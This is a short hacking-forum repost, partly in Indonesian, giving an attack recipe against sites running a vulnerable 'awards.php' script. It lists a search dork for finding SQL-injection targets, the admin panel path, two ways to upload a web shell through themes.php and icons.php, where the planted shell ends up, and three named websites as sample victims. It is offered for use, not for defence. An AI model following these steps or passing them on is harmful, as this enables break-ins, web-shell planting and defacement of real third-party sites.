Dork = inurl:"awards.php?d=" [SQLi]
admin = http://[target]/[path]/admin/index.php
Upload shell =
1. http://[target]/[path]/admin/themes.php (fetch XML)
2. http://[target]/[path]/admin/icons.php (tamper data)
Shell lokasi =
1. http://[target]/[path]/themes/[shell]
2. http://[target]/[path]/img/icons/[shell]
Sample =
http://www.clanfga.com/d3b/
http://cs3.darkarena.ro/
http://www.alliance-tous-risques.fr/
Original post by : d3b-X
Sumber http://hacker-newbie.org/showthread.php?tid=16859
0 comments: